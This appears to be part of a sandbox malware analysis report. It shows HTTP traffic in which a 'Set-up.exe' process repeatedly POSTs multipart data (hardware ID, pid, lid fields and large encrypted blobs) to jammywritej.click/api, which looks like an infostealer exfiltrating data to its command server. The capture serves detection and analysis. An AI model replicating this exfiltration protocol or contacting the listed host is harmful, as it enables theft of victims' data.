2024-12-28 11:19:16 UTC	275	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=5YD6ZCQRKQ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18110 Host: jammywritej.click
2024-12-28 11:19:16 UTC	15331	OUT	Data Raw: 2d 2d 35 59 44 36 5a 43 51 52 4b 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 41 30 43 31 31 37 35 42 42 42 42 34 32 31 37 42 43 46 44 36 38 42 37 37 34 45 46 39 42 37 41 0d 0a 2d 2d 35 59 44 36 5a 43 51 52 4b 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 35 59 44 36 5a 43 51 52 4b 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 71 59 75 45 46 42 2d 2d 0d 0a 2d 2d 35 59 44 36 5a 43 51 52 4b 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f Data Ascii: --5YD6ZCQRKQContent-Disposition: form-data; name="hwid"5A0C1175BBBB4217BCFD68B774EF9B7A--5YD6ZCQRKQContent-Disposition: form-data; name="pid"2--5YD6ZCQRKQContent-Disposition: form-data; name="lid"qYuEFB----5YD6ZCQRKQContent-Dispo
2024-12-28 11:19:16 UTC	2779	OUT	Data Raw: cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 94 6d 93 be 93 15 d7 52 9c ab a6 b6 5f c9 35 8b 56 2d Data Ascii: \f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTwmR_5V-
2024-12-28 11:19:17 UTC	1142	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 11:19:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=f7ptdpmvhoss51v9t85b4nhgcu; expires=Wed, 23 Apr 2025 05:05:55 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NKbteD%2FMmAF6U2z1TYnY%2FWMH7RPP51jGT2s11wR%2Fi28Zg30Y6rsSjwPGzvo56ExxnAGCcAf5tSVnYT3jBaxmqVuzViOL%2FSR5ZKrUB3vyIIpB4I3M%2F5TjT87b7s%2FXqybX%2FTLd1g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f91278638d342d7-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2069&min_rtt=2024&rtt_var=791&sent=16&recv=22&lost=0&retrans=0&sent_bytes=2843&recv_bytes=19065&delivery_rate=1442687&cwnd=245&unsent_bytes=0&cid=c2c1d285501747b0&ts=1065&x=0"
2024-12-28 11:19:17 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-28 11:19:17 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49741	104.21.87.112	443	5356	C:\Users\user\Desktop\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 11:19:18 UTC	280	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=X9PKIBZRGE0HEAOL User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8767 Host: jammywritej.click
2024-12-28 11:19:18 UTC	8767	OUT	Data Raw: 2d 2d 58 39 50 4b 49 42 5a 52 47 45 30 48 45 41 4f 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 41 30 43 31 31 37 35 42 42 42 42 34 32 31 37 42 43 46 44 36 38 42 37 37 34 45 46 39 42 37 41 0d 0a 2d 2d 58 39 50 4b 49 42 5a 52 47 45 30 48 45 41 4f 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 58 39 50 4b 49 42 5a 52 47 45 30 48 45 41 4f 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 71 59 75 45 46 42 2d 2d 0d 0a 2d 2d 58 39 50 4b 49 42 5a Data Ascii: --X9PKIBZRGE0HEAOLContent-Disposition: form-data; name="hwid"5A0C1175BBBB4217BCFD68B774EF9B7A--X9PKIBZRGE0HEAOLContent-Disposition: form-data; name="pid"2--X9PKIBZRGE0HEAOLContent-Disposition: form-data; name="lid"qYuEFB----X9PKIBZ
2024-12-28 11:19:19 UTC	1131	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 11:19:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=iph3sct1d8hkefilq9u7q1me4d; expires=Wed, 23 Apr 2025 05:05:58 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LSYsf9pr4%2FOZIFnD1xzZbusdi8S83KHK61dIWGlKGWuIL%2BLpIrUpnsQVSxpn1kAGPByU5U1Q8Ny56jRsjDIMIwNMfyF1RE2zgHnQcA4NCpwAR4jO%2FsNMjg0ftwfZrGnkbgu2lg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f9127963c855e71-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1729&min_rtt=1723&rtt_var=659&sent=9&recv=13&lost=0&retrans=0&sent_bytes=2843&recv_bytes=9705&delivery_rate=1645070&cwnd=238&unsent_bytes=0&cid=9511aa766da74143&ts=964&x=0"
2024-12-28 11:19:19 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-28 11:19:19 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49744	104.21.87.112	443	5356	C:\Users\user\Desktop\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 11:19:20 UTC	283	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=IBYOPCR6R5GSF8GGSP User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20432 Host: jammywritej.click
2024-12-28 11:19:20 UTC	15331	OUT	Data Raw: 2d 2d 49 42 59 4f 50 43 52 36 52 35 47 53 46 38 47 47 53 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 41 30 43 31 31 37 35 42 42 42 42 34 32 31 37 42 43 46 44 36 38 42 37 37 34 45 46 39 42 37 41 0d 0a 2d 2d 49 42 59 4f 50 43 52 36 52 35 47 53 46 38 47 47 53 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 49 42 59 4f 50 43 52 36 52 35 47 53 46 38 47 47 53 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 71 59 75 45 46 42 2d 2d 0d 0a 2d 2d 49 Data Ascii: --IBYOPCR6R5GSF8GGSPContent-Disposition: form-data; name="hwid"5A0C1175BBBB4217BCFD68B774EF9B7A--IBYOPCR6R5GSF8GGSPContent-Disposition: form-data; name="pid"3--IBYOPCR6R5GSF8GGSPContent-Disposition: form-data; name="lid"qYuEFB----I
2024-12-28 11:19:20 UTC	5101	OUT	Data Raw: 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 Data Ascii: `M?lrQMn 64F6(X&7~`aO
2024-12-28 11:19:21 UTC	1133	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 11:19:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=cl91k2dhb8l90atif3o1b1bnlu; expires=Wed, 23 Apr 2025 05:06:00 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VZ%2FTMqcTxWImX5N2CWub3XubaukaF6dUeI6po6Ne4uZR7%2BZkX02UkoDofnLOLE1JGPbQtSdlpwrZH03BG3O4bgRJzwSqLGQ3vuaje6WGIi7kBFP46StyxY54mcvpOSGgBPxU%2Fg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f9127a50c334288-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1983&min_rtt=1981&rtt_var=747&sent=12&recv=24&lost=0&retrans=0&sent_bytes=2842&recv_bytes=21395&delivery_rate=1461461&cwnd=245&unsent_bytes=0&cid=ad0f114294e3e04a&ts=959&x=0"
2024-12-28 11:19:21 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-28 11:19:21 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49746	104.21.87.112	443	5356	C:\Users\user\Desktop\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 11:19:23 UTC	283	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=IV9TAXW9RUFPCXLWNEY User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1259 Host: jammywritej.click
2024-12-28 11:19:23 UTC	1259	OUT	Data Raw: 2d 2d 49 56 39 54 41 58 57 39 52 55 46 50 43 58 4c 57 4e 45 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 41 30 43 31 31 37 35 42 42 42 42 34 32 31 37 42 43 46 44 36 38 42 37 37 34 45 46 39 42 37 41 0d 0a 2d 2d 49 56 39 54 41 58 57 39 52 55 46 50 43 58 4c 57 4e 45 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 49 56 39 54 41 58 57 39 52 55 46 50 43 58 4c 57 4e 45 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 71 59 75 45 46 42 2d 2d 0d 0a Data Ascii: --IV9TAXW9RUFPCXLWNEYContent-Disposition: form-data; name="hwid"5A0C1175BBBB4217BCFD68B774EF9B7A--IV9TAXW9RUFPCXLWNEYContent-Disposition: form-data; name="pid"1--IV9TAXW9RUFPCXLWNEYContent-Disposition: form-data; name="lid"qYuEFB--
2024-12-28 11:19:24 UTC	1132	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 11:19:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=blf01t5r4l89mjlmmmpqtf87n3; expires=Wed, 23 Apr 2025 05:06:03 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kp2SJP9WMmv0csO909%2BKfJbpy4i4nYiqD6oQSzyi9cvq3Zqs2QO8SD3ONT4aD1MXNmjhg%2FVNIErB%2BNlSrspWrUtecmpNzAlr34IeMBxQjYBFRRqRLyI%2FRCO0jijmjxsI5qerYw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f9127b5cdf54379-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2127&min_rtt=2127&rtt_var=799&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2842&recv_bytes=2178&delivery_rate=1368322&cwnd=194&unsent_bytes=0&cid=19ba5d0554dd9a24&ts=763&x=0"
2024-12-28 11:19:24 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-28 11:19:24 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49748	104.21.87.112	443	5356	C:\Users\user\Desktop\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 11:19:26 UTC	278	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=3RDZ44UHNY26 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 585323 Host: jammywritej.click
2024-12-28 11:19:26 UTC	15331	OUT	Data Raw: 2d 2d 33 52 44 5a 34 34 55 48 4e 59 32 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 41 30 43 31 31 37 35 42 42 42 42 34 32 31 37 42 43 46 44 36 38 42 37 37 34 45 46 39 42 37 41 0d 0a 2d 2d 33 52 44 5a 34 34 55 48 4e 59 32 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 33 52 44 5a 34 34 55 48 4e 59 32 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 71 59 75 45 46 42 2d 2d 0d 0a 2d 2d 33 52 44 5a 34 34 55 48 4e 59 32 36 0d 0a 43 6f 6e 74 65 Data Ascii: --3RDZ44UHNY26Content-Disposition: form-data; name="hwid"5A0C1175BBBB4217BCFD68B774EF9B7A--3RDZ44UHNY26Content-Disposition: form-data; name="pid"1--3RDZ44UHNY26Content-Disposition: form-data; name="lid"qYuEFB----3RDZ44UHNY26Conte
2024-12-28 11:19:26 UTC	15331	OUT	Data Raw: c9 2c 37 a7 89 6e bd a2 26 95 38 68 ef 13 ba 98 a5 8a 8d a8 88 3f ce 04 de 07 a1 b2 4b 35 33 a5 d7 f8 71 03 83 5b 79 85 c4 c7 b0 97 3a 61 a0 44 a9 12 41 7f 9e de 68 a8 8d 19 3a 72 76 52 3b fc af 8f fb 44 6d 30 b7 5b fa 09 ce fc cf 0b 0f 4e ad 99 cf c8 74 55 3d c8 56 47 b3 a7 d5 4d d9 ef df a7 42 f4 1d a6 42 36 f4 55 f3 0e 36 55 4f 54 83 92 a4 3d 21 85 77 67 5a ba 38 cf e4 57 e0 06 f9 7b a0 2d a8 3a ba 37 e1 34 67 c7 6c a1 49 98 fb a1 94 bd b8 69 c6 90 8b 9b 8f 72 d7 2a 6f 08 6f c3 f9 fc f5 f5 9a 83 d4 f3 ec f4 79 9f 18 61 00 f4 22 a8 d6 a8 14 9a 65 91 18 fd a7 78 f7 ea 49 bf e5 2f e1 39 a0 47 d8 f7 b6 ee 13 d0 53 0d d8 c1 bb d7 93 0f 7e 72 5d 4d 29 0b ec 74 53 e1 bb cf 46 9d 66 9b cd 6d ae f3 4e 52 64 c9 54 d8 8b c9 3f 6b 10 bf 75 e2 d0 8f 0e a2 de db 9a Data Ascii: ,7n&8h?K53q[y:aDAh:rvR;Dm0[NtU=VGMBB6U6UOT=!wgZ8W{-:74glIir*ooya"exI/9GS~r]M)tSFfmNRdT?ku
2024-12-28 11:19:26 UTC	15331	OUT	Data Raw: 14 1b 05 f6 a4 a6 97 8d 50 f0 fc 68 1c 07 28 7e 2a 06 fb f3 66 4a bb 6f 3c 39 4c 50 09 48 ef 62 ca cd 66 eb 58 3a d7 59 1b a1 44 bd 2c 9e 47 73 30 08 76 53 d6 86 f2 5e 28 44 d3 87 b6 c0 a2 c7 21 b3 8b 0d 92 82 ba 6e e7 df 2b 5d f0 db 17 29 a4 f6 3a 95 46 f8 4e cb cc 80 13 f8 7c 21 e8 e4 45 d5 df 77 d8 4a 82 48 26 61 10 dd 64 77 39 8f 73 45 0c 9b d9 0a f3 8b bd 5e 4f 02 f8 26 ad ef 6c 76 7f 15 50 ae a9 c4 6a ae 79 75 3d 0d b5 73 d9 18 78 0c 2b 73 ba cd a0 5b a7 11 f3 7b 79 9c 46 5b 21 ea 3e cc 49 c9 f3 a4 0e 46 a4 17 6f 0c e1 79 c4 37 1e 51 57 88 f7 a1 43 a5 38 fb 3c 03 38 7e 6f fe 21 50 fe 2f 32 30 36 e7 8b a3 f6 be e8 fa e1 ed d2 9b d2 51 e1 be 53 d7 80 99 88 cc 72 63 41 ce c5 5c 17 7b 98 93 b5 11 d6 c1 d1 fe c0 31 8d 61 25 38 73 f8 d8 19 c9 14 b2 32 86 Data Ascii: Ph(~*fJo<9LPHbfX:YD,Gs0vS^(D!n+]):FN\|!EwJH&adw9sE^O&lvPjyu=sx+s[{yF[!>IFoy7QWC8<8~o!P/206QSrcA\{1a%8s2
2024-12-28 11:19:26 UTC	15331	OUT	Data Raw: 60 25 e5 22 eb 8f 9e 41 ff b1 d4 a1 99 e7 e1 2b 50 0e 32 f8 a2 03 b1 2b 71 bb fa c8 dd 57 cd b7 ac 8d 1f 31 6c 3a 82 3c 80 20 e4 dc 73 ce ae 40 f1 77 67 d5 d2 60 ad 4a 01 e7 f4 80 10 d9 97 73 94 3d 86 02 e1 d9 2d b5 12 19 97 ff 8b df 1f 77 6e f8 48 5f f8 f2 c9 fb 82 45 e7 c0 16 9b 79 c1 f3 35 77 07 02 28 01 5e 5b 95 7b b0 d5 dd 17 ec cf 47 55 8b 6a 97 0a 80 43 09 44 36 e4 3a 2f 6d e2 b6 50 2a bf 4d a4 54 16 e4 b1 88 7e 75 77 a2 e2 85 53 2a 7c 6f 6f 02 cf f9 32 13 a2 29 20 6d 19 46 f6 73 c3 9b 29 f4 8d c8 3b 9c 93 10 6f 02 3c 72 29 03 20 bf 13 c4 ef 66 be 5c 1e 3d 4f 10 7d ce 30 d0 53 97 bc 0f a9 ad 23 80 66 80 07 14 e2 62 59 6d 03 ac 26 2f f8 14 44 c8 7d 5a 54 c2 93 9e 52 78 ba 8e fe 53 fd 0b 73 67 a5 20 80 7a fc eb bc 21 c0 55 ec 2c 33 f9 ac ac 42 12 12 Data Ascii: `%"A+P2+qW1l:< s@wg`Js=-wnH_Ey5w(^[{GUjCD6:/mPMT~uwS\|oo2) mFs);o<r) f\=O}0S#fbYm&/D}ZTRxSsg z!U,3B
2024-12-28 11:19:26 UTC	15331	OUT	Data Raw: 6b 5a e3 51 6a 4a 51 91 ec 01 e1 7a be 5c 11 9c a2 9f d2 41 6e 6e 74 88 23 f4 4a 76 9d b4 f2 79 69 8d 86 15 4b 6a ce 35 15 f9 ed 26 31 06 0d 75 55 dd 4a a8 ef 8c bc 27 66 b1 57 c4 65 82 0f d5 5a 49 82 13 37 1a 2f ed 78 0b cc 39 ee 8d 66 3b 42 5f fb e1 f3 fd f5 33 9b 23 3f fa f4 a4 d8 f2 1a 8d b4 99 96 fd da a3 11 b1 31 69 0c 9e 50 28 5e de f5 cb fd ca d5 32 15 40 73 55 19 9c 5e 82 cc aa c3 ed 72 54 54 f1 f3 a1 ed 2b 6b 7e a3 6d 1b 96 15 2d 6b af 37 dd e2 22 eb d6 d5 0e f2 24 aa a8 0c 34 6e c4 7b 1c 12 49 33 e4 a2 b6 01 7b d3 3c cd d0 9f a3 a3 dc 36 a0 05 c1 7f df 53 71 98 64 5a c1 09 f9 11 2d da 7c 77 70 d5 3b 9d e4 90 57 cb 95 e1 b4 4e f1 24 1e 06 c4 0b c4 16 07 51 84 b6 d0 9c 35 88 af d0 00 ef 5c 85 46 0b ac a3 e0 a5 86 a9 73 8f c4 87 cf a3 99 35 cd 11 Data Ascii: kZQjJQz\Annt#JvyiKj5&1uUJ'fWeZI7/x9f;B_3#?1iP(^2@sU^rTT+k~m-k7"$4n{I3{<6SqdZ-\|wp;WN$Q5\Fs5
2024-12-28 11:19:26 UTC	15331	OUT	Data Raw: e5 48 6c 8a 49 4f 87 94 6c 61 b7 f6 a6 8c 58 ec cd bc 81 2f 6b 30 91 99 80 e6 87 ef 31 02 17 5d e5 43 f5 9d 5b 6b 8c 3d 31 22 67 aa 10 38 2f 95 1c b3 28 de 1a f2 38 75 6c 36 b9 da e1 80 d7 44 9f 5a 61 7a 81 e8 0c 19 69 3e c9 f7 bd c8 57 b0 2f c6 4b 5d 27 7b 97 b2 3a 46 15 f0 42 a2 a2 cc b5 f9 d4 42 6c bf 7f a6 8b cd a4 c0 61 9d 66 6f df ad 7d 42 c9 09 7b f3 74 b8 7c 7a 89 90 91 27 28 3e 34 b2 03 64 2e 9c 63 36 30 0e 5d f6 88 35 c5 b2 a6 3e 16 7c aa ec 82 dc 52 c2 04 90 23 ec 88 5f f1 4f 88 34 02 76 31 97 67 6a 60 1a a8 51 09 9b 9c 9e c9 69 c6 81 fd 6a ed f6 f0 63 30 a3 58 fd 1f a3 a4 35 78 b2 f5 0a 4f e0 5e c0 82 aa 7c 2f 12 69 7e e4 54 e5 4c f5 f0 81 57 ba bb be 3a f7 4e b7 a6 95 dc f9 8f 0e d1 5d 29 26 e1 60 31 5a 84 e3 c8 f3 93 45 a1 c1 b5 53 84 bf 86 Data Ascii: HlIOlaX/k01]C[k=1"g8/(8ul6DZazi>W/K]'{:FBBlafo}B{t\|z'(>4d.c60]5>\|R#_O4v1gj`Qijc0X5xO^\|/i~TLW:N])&`1ZES
2024-12-28 11:19:26 UTC	15331	OUT	Data Raw: ee 96 7e ab fd e7 d5 9d b2 7d a5 4b 93 ba bb 09 dc de d6 bf ab b8 7f 86 f7 10 36 96 d2 5a b1 8b af 94 41 4f 9a c0 20 05 86 45 04 4c aa 36 af 8b 82 34 06 58 ac 1b ff 7d 08 64 a3 60 a6 76 a6 16 ce 02 10 b2 21 14 02 21 0e d6 c5 a1 9c d7 03 6a bf 4e 23 79 a1 14 9c dc 32 fb 60 8f 01 82 17 2e 8a 1f de 4f c8 da bc d8 9f fe 51 e3 fb 4e 11 53 74 38 0c 3f 6b ba bc dc dd 5d f9 67 e1 aa 68 6a 18 db 30 c7 ec 43 0c cb db 7b c3 fd c5 23 88 94 e1 45 3f 04 66 ad bd 85 81 88 20 b6 45 72 bb 39 22 6f 79 bd e4 51 f3 ed cb a2 9a 78 5e 8a ed 3f ba f4 f0 82 27 be ed 1f 78 55 1e ea 92 83 e5 a1 3b a5 20 08 03 1f c2 e0 df ed c2 0b 20 fe 4c a5 67 0b da 8c 55 f9 f1 d1 8f bf 1d 4f 17 00 97 7e b0 63 7f 80 c2 16 62 4d 65 52 10 ce c6 7a 92 73 6b 26 97 a7 b6 64 d2 0c 38 47 e4 b3 5b 13 0d Data Ascii: ~}K6ZAO EL64X}d`v!!jN#y2`.OQNSt8?k]ghj0C{#E?f Er9"oyQx^?'xU; LgUO~cbMeRzsk&d8G[
